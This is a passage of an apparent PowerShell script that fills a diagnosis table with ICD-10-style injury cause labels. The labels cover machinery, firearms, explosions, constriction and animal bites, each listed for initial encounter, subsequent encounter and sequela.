$DiagnosisList.Rows.Add("Contact with other specified machinery","Contact with other specified machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other specified machinery","Contact with other specified machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other specified machinery","Contact with other specified machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with unspecified machinery","Contact with unspecified machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified machinery","Contact with unspecified machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified machinery","Contact with unspecified machinery, sequela") + $null = $DiagnosisList.Rows.Add("Accidental handgun discharge","Accidental handgun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental handgun discharge","Accidental handgun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental handgun discharge","Accidental handgun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Accidental handgun malfunction","Accidental handgun malfunction, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental handgun malfunction","Accidental handgun malfunction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental handgun malfunction","Accidental handgun malfunction, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of unspecified larger firearm","Accidental discharge of unspecified larger firearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of unspecified larger firearm","Accidental discharge of unspecified larger firearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of unspecified larger firearm","Accidental discharge of unspecified larger firearm, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of shotgun","Accidental discharge of shotgun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of shotgun","Accidental discharge of shotgun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of shotgun","Accidental discharge of shotgun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of hunting rifle","Accidental discharge of hunting rifle, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of hunting rifle","Accidental discharge of hunting rifle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of hunting rifle","Accidental discharge of hunting rifle, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of machine gun","Accidental discharge of machine gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of machine gun","Accidental discharge of machine gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of machine gun","Accidental discharge of machine gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of other larger firearm","Accidental discharge of other larger firearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of other larger firearm","Accidental discharge of other larger firearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of other larger firearm","Accidental discharge of other larger firearm, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of unspecified larger firearm","Accidental malfunction of unspecified larger firearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of unspecified larger firearm","Accidental malfunction of unspecified larger firearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of unspecified larger firearm","Accidental malfunction of unspecified larger firearm, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of shotgun","Accidental malfunction of shotgun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of shotgun","Accidental malfunction of shotgun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of shotgun","Accidental malfunction of shotgun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of hunting rifle","Accidental malfunction of hunting rifle, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of hunting rifle","Accidental malfunction of hunting rifle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of hunting rifle","Accidental malfunction of hunting rifle, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of machine gun","Accidental malfunction of machine gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of machine gun","Accidental malfunction of machine gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of machine gun","Accidental malfunction of machine gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of other larger firearm","Accidental malfunction of other larger firearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of other larger firearm","Accidental malfunction of other larger firearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of other larger firearm","Accidental malfunction of other larger firearm, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge from unspecified firearms or gun","Accidental discharge from unspecified firearms or gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge from unspecified firearms or gun","Accidental discharge from unspecified firearms or gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge from unspecified firearms or gun","Accidental discharge from unspecified firearms or gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of airgun","Accidental discharge of airgun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of airgun","Accidental discharge of airgun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of airgun","Accidental discharge of airgun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of paintball gun","Accidental discharge of paintball gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of paintball gun","Accidental discharge of paintball gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of paintball gun","Accidental discharge of paintball gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge of other gas, air or spring-operated gun","Accidental discharge of other gas, air or spring-operated gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of other gas, air or spring-operated gun","Accidental discharge of other gas, air or spring-operated gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge of other gas, air or spring-operated gun","Accidental discharge of other gas, air or spring-operated gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental discharge from other specified firearms","Accidental discharge from other specified firearms, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge from other specified firearms","Accidental discharge from other specified firearms, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental discharge from other specified firearms","Accidental discharge from other specified firearms, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction from unspecified firearms or gun","Accidental malfunction from unspecified firearms or gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction from unspecified firearms or gun","Accidental malfunction from unspecified firearms or gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction from unspecified firearms or gun","Accidental malfunction from unspecified firearms or gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of airgun","Accidental malfunction of airgun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of airgun","Accidental malfunction of airgun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of airgun","Accidental malfunction of airgun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of paintball gun","Accidental malfunction of paintball gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of paintball gun","Accidental malfunction of paintball gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of paintball gun","Accidental malfunction of paintball gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of other gas, air or spring-operated gun","Accidental malfunction of other gas, air or spring-operated gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of other gas, air or spring-operated gun","Accidental malfunction of other gas, air or spring-operated gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction of other gas, air or spring-operated gun","Accidental malfunction of other gas, air or spring-operated gun, sequela") + $null = $DiagnosisList.Rows.Add("Accidental malfunction from other specified firearms","Accidental malfunction from other specified firearms, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction from other specified firearms","Accidental malfunction from other specified firearms, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental malfunction from other specified firearms","Accidental malfunction from other specified firearms, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of boiler","Explosion and rupture of boiler, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of boiler","Explosion and rupture of boiler, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of boiler","Explosion and rupture of boiler, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of aerosol can","Explosion and rupture of aerosol can, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of aerosol can","Explosion and rupture of aerosol can, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of aerosol can","Explosion and rupture of aerosol can, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of air tank","Explosion and rupture of air tank, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of air tank","Explosion and rupture of air tank, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of air tank","Explosion and rupture of air tank, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of pressurized-gas tank","Explosion and rupture of pressurized-gas tank, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of pressurized-gas tank","Explosion and rupture of pressurized-gas tank, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of pressurized-gas tank","Explosion and rupture of pressurized-gas tank, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other gas cylinder","Explosion and rupture of other gas cylinder, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other gas cylinder","Explosion and rupture of other gas cylinder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other gas cylinder","Explosion and rupture of other gas cylinder, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of unspecified gas cylinder","Explosion and rupture of unspecified gas cylinder, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of unspecified gas cylinder","Explosion and rupture of unspecified gas cylinder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of unspecified gas cylinder","Explosion and rupture of unspecified gas cylinder, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of bicycle tire","Explosion of bicycle tire, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of bicycle tire","Explosion of bicycle tire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of bicycle tire","Explosion of bicycle tire, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other pressurized tire, pipe or hose","Explosion and rupture of other pressurized tire, pipe or hose, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other pressurized tire, pipe or hose","Explosion and rupture of other pressurized tire, pipe or hose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other pressurized tire, pipe or hose","Explosion and rupture of other pressurized tire, pipe or hose, sequela") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other specified pressurized devices","Explosion and rupture of other specified pressurized devices, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other specified pressurized devices","Explosion and rupture of other specified pressurized devices, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion and rupture of other specified pressurized devices","Explosion and rupture of other specified pressurized devices, sequela") + $null = $DiagnosisList.Rows.Add("Discharge of firework","Discharge of firework, initial encounter") + $null = $DiagnosisList.Rows.Add("Discharge of firework","Discharge of firework, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Discharge of firework","Discharge of firework, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of blasting material","Explosion of blasting material, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of blasting material","Explosion of blasting material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of blasting material","Explosion of blasting material, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of explosive gases","Explosion of explosive gases, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of explosive gases","Explosion of explosive gases, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of explosive gases","Explosion of explosive gases, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of other specified explosive materials","Explosion of other specified explosive materials, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of other specified explosive materials","Explosion of other specified explosive materials, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of other specified explosive materials","Explosion of other specified explosive materials, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of unspecified explosive materials","Explosion of unspecified explosive materials, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of unspecified explosive materials","Explosion of unspecified explosive materials, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of unspecified explosive materials","Explosion of unspecified explosive materials, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to supersonic waves","Exposure to supersonic waves, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to supersonic waves","Exposure to supersonic waves, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to supersonic waves","Exposure to supersonic waves, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other noise","Exposure to other noise, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other noise","Exposure to other noise, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other noise","Exposure to other noise, sequela") + $null = $DiagnosisList.Rows.Add("Nail entering through skin","Nail entering through skin, initial encounter") + $null = $DiagnosisList.Rows.Add("Nail entering through skin","Nail entering through skin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Nail entering through skin","Nail entering through skin, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign body or object entering through skin","Other foreign body or object entering through skin, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign body or object entering through skin","Other foreign body or object entering through skin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign body or object entering through skin","Other foreign body or object entering through skin, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hypodermic needle","Contact with hypodermic needle, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hypodermic needle","Contact with hypodermic needle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hypodermic needle","Contact with hypodermic needle, sequela") + $null = $DiagnosisList.Rows.Add("Contact with contaminated hypodermic needle","Contact with contaminated hypodermic needle, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with contaminated hypodermic needle","Contact with contaminated hypodermic needle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with contaminated hypodermic needle","Contact with contaminated hypodermic needle, sequela") + $null = $DiagnosisList.Rows.Add("Hair causing external constriction","Hair causing external constriction, initial encounter") + $null = $DiagnosisList.Rows.Add("Hair causing external constriction","Hair causing external constriction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hair causing external constriction","Hair causing external constriction, sequela") + $null = $DiagnosisList.Rows.Add("String or thread causing external constriction","String or thread causing external constriction, initial encounter") + $null = $DiagnosisList.Rows.Add("String or thread causing external constriction","String or thread causing external constriction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("String or thread causing external constriction","String or thread causing external constriction, sequela") + $null = $DiagnosisList.Rows.Add("Rubber band causing external constriction","Rubber band causing external constriction, initial encounter") + $null = $DiagnosisList.Rows.Add("Rubber band causing external constriction","Rubber band causing external constriction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rubber band causing external constriction","Rubber band causing external constriction, sequela") + $null = $DiagnosisList.Rows.Add("Ring or other jewelry causing external constriction","Ring or other jewelry causing external constriction, initial encounter") + $null = $DiagnosisList.Rows.Add("Ring or other jewelry causing external constriction","Ring or other jewelry causing external constriction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ring or other jewelry causing external constriction","Ring or other jewelry causing external constriction, sequela") + $null = $DiagnosisList.Rows.Add("Other specified item causing external constriction","Other specified item causing external constriction, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified item causing external constriction","Other specified item causing external constriction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified item causing external constriction","Other specified item causing external constriction, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other inanimate mechanical forces","Exposure to other inanimate mechanical forces, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other inanimate mechanical forces","Exposure to other inanimate mechanical forces, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other inanimate mechanical forces","Exposure to other inanimate mechanical forces, sequela") + $null = $DiagnosisList.Rows.Add("Accidental hit or strike by another person","Accidental hit or strike by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental hit or strike by another person","Accidental hit or strike by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental hit or strike by another person","Accidental hit or strike by another person, sequela") + $null = $DiagnosisList.Rows.Add("Accidental kick by another person","Accidental kick by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental kick by another person","Accidental kick by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental kick by another person","Accidental kick by another person, sequela") + $null = $DiagnosisList.Rows.Add("Accidental twist by another person","Accidental twist by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental twist by another person","Accidental twist by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental twist by another person","Accidental twist by another person, sequela") + $null = $DiagnosisList.Rows.Add("Accidental bite by another person","Accidental bite by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental bite by another person","Accidental bite by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental bite by another person","Accidental bite by another person, sequela") + $null = $DiagnosisList.Rows.Add("Accidental scratch by another person","Accidental scratch by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental scratch by another person","Accidental scratch by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental scratch by another person","Accidental scratch by another person, sequela") + $null = $DiagnosisList.Rows.Add("Accidental striking against or bumped into by another person","Accidental striking against or bumped into by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental striking against or bumped into by another person","Accidental striking against or bumped into by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental striking against or bumped into by another person","Accidental striking against or bumped into by another person, sequela") + $null = $DiagnosisList.Rows.Add("Crushed, pushed or stepped on by crowd or human stampede","Crushed, pushed or stepped on by crowd or human stampede, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed, pushed or stepped on by crowd or human stampede","Crushed, pushed or stepped on by crowd or human stampede, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed, pushed or stepped on by crowd or human stampede","Crushed, pushed or stepped on by crowd or human stampede, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by mouse","Bitten by mouse, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by mouse","Bitten by mouse, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by mouse","Bitten by mouse, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with mouse","Other contact with mouse, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with mouse","Other contact with mouse, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with mouse","Other contact with mouse, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by rat","Bitten by rat, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by rat","Bitten by rat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by rat","Bitten by rat, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with rat","Other contact with rat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with rat","Other contact with rat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with rat","Other contact with rat, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by squirrel","Bitten by squirrel, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by squirrel","Bitten by squirrel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by squirrel","Bitten by squirrel, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with squirrel","Other contact with squirrel, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with squirrel","Other contact with squirrel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with squirrel","Other contact with squirrel, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other rodent","Bitten by other rodent, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other rodent","Bitten by other rodent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other rodent","Bitten by other rodent, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other rodent","Other contact with other rodent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other rodent","Other contact with other rodent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other rodent","Other contact with other rodent, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by dog","Bitten by dog, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by dog","Bitten by dog, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by dog","Bitten by dog, sequela") + $null = $DiagnosisList.Rows.Add("Struck by dog","Struck by dog, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by dog","Struck by dog, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by dog","Struck by dog, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with dog","Other contact with dog, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with dog","Other contact with dog, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with dog","Other contact with dog, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by cat","Bitten by cat, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by cat","Bitten by cat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by cat","Bitten by cat, sequela") + $null = $DiagnosisList.Rows.Add("Scratched by cat","Scratched by cat, initial encounter") + $null = $DiagnosisList.Rows.Add("Scratched by cat","Scratched by cat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Scratched by cat","Scratched by cat, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with cat","Other contact with cat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with cat","Other contact with cat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with cat","Other contact with cat, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by horse","Bitten by horse, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by horse","Bitten by horse, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by horse","Bitten by horse, sequela") + $null = $DiagnosisList.Rows.Add("Struck by horse","Struck by horse, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by horse","Struck by horse, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by horse","Struck by horse, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with horse","Other contact with horse, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with horse","Other contact with horse, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with horse","Other contact with horse, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by cow","Bitten by cow, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by cow","Bitten by cow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by cow","Bitten by cow, sequela") + $null = $DiagnosisList.Rows.Add("Struck by cow","Struck by cow, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by cow","Struck by cow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by cow","Struck by cow, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with cow","Other contact with cow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with cow","Other contact with cow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with cow","Other contact with cow, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other hoof stock","Bitten by other hoof stock, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other hoof stock","Bitten by other hoof stock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other hoof stock","Bitten by other hoof stock, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other hoof stock","Struck by other hoof stock, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other hoof stock","Struck by other hoof stock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other hoof stock","Struck by other hoof stock, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other hoof stock","Other contact with other hoof stock, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other hoof stock","Other contact with other hoof stock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other hoof stock","Other contact with other hoof stock, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by pig","Bitten by pig, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by pig","Bitten by pig, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by pig","Bitten by pig, sequela") + $null = $DiagnosisList.Rows.Add("Struck by pig","Struck by pig, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by pig","Struck by pig, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by pig","Struck by pig, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with pig","Other contact with pig, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with pig","Other contact with pig, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with pig","Other contact with pig, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by raccoon","Bitten by raccoon, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by raccoon","Bitten by raccoon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by raccoon","Bitten by raccoon, sequela") + $null = $DiagnosisList.Rows.Add("Struck by raccoon","Struck by raccoon, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by raccoon","Struck by raccoon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by raccoon","Struck by raccoon, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with raccoon","Other contact with raccoon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with raccoon","Other contact with raccoon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with raccoon","Other contact with raccoon, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other mammals","Bitten by other mammals, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other mammals","Bitten by other mammals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other mammals","Bitten by other mammals, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other mammals","Struck by other mammals, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other mammals","Struck by other mammals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other mammals","Struck by other mammals, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other mammals","Other contact with other mammals, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other mammals","Other contact with other mammals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other mammals","Other contact with other mammals, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by dolphin","Bitten by dolphin, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by dolphin","Bitten by dolphin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by dolphin","Bitten by dolphin, sequela") + $null = $DiagnosisList.Rows.Add("Struck by dolphin","Struck by dolphin, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by dolphin","Struck by dolphin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by dolphin","Struck by dolphin, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with dolphin","Other contact with dolphin, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with dolphin","Other contact with dolphin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with dolphin","Other contact with dolphin, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by sea lion","Bitten by sea lion, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by sea lion","Bitten by sea lion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by sea lion","Bitten by sea lion, sequela") + $null = $DiagnosisList.Rows.Add("Struck by sea lion","Struck by sea lion, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by sea lion","Struck by sea lion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by sea lion","Struck by sea lion, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with sea lion","Other contact with sea lion, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with sea lion","Other contact with sea lion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with sea lion","Other contact with sea lion, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by orca","Bitten by orca, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by orca","Bitten by orca, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by orca","Bitten by orca, sequela") + $null = $DiagnosisList.Rows.Add("Struck by orca","Struck by orca, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by orca","Struck by orca, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by orca","Struck by orca, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with orca","Other contact with orca, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with orca","Other contact with orca, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with orca","Other contact with orca, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other marine mammals","Bitten by other marine mammals, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other marine mammals","Bitten by other marine mammals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other marine mammals","Bitten by other marine mammals, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other marine mammals","Struck by other marine mammals, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other marine mammals","Struck by other marine mammals, subsequent encounter") + 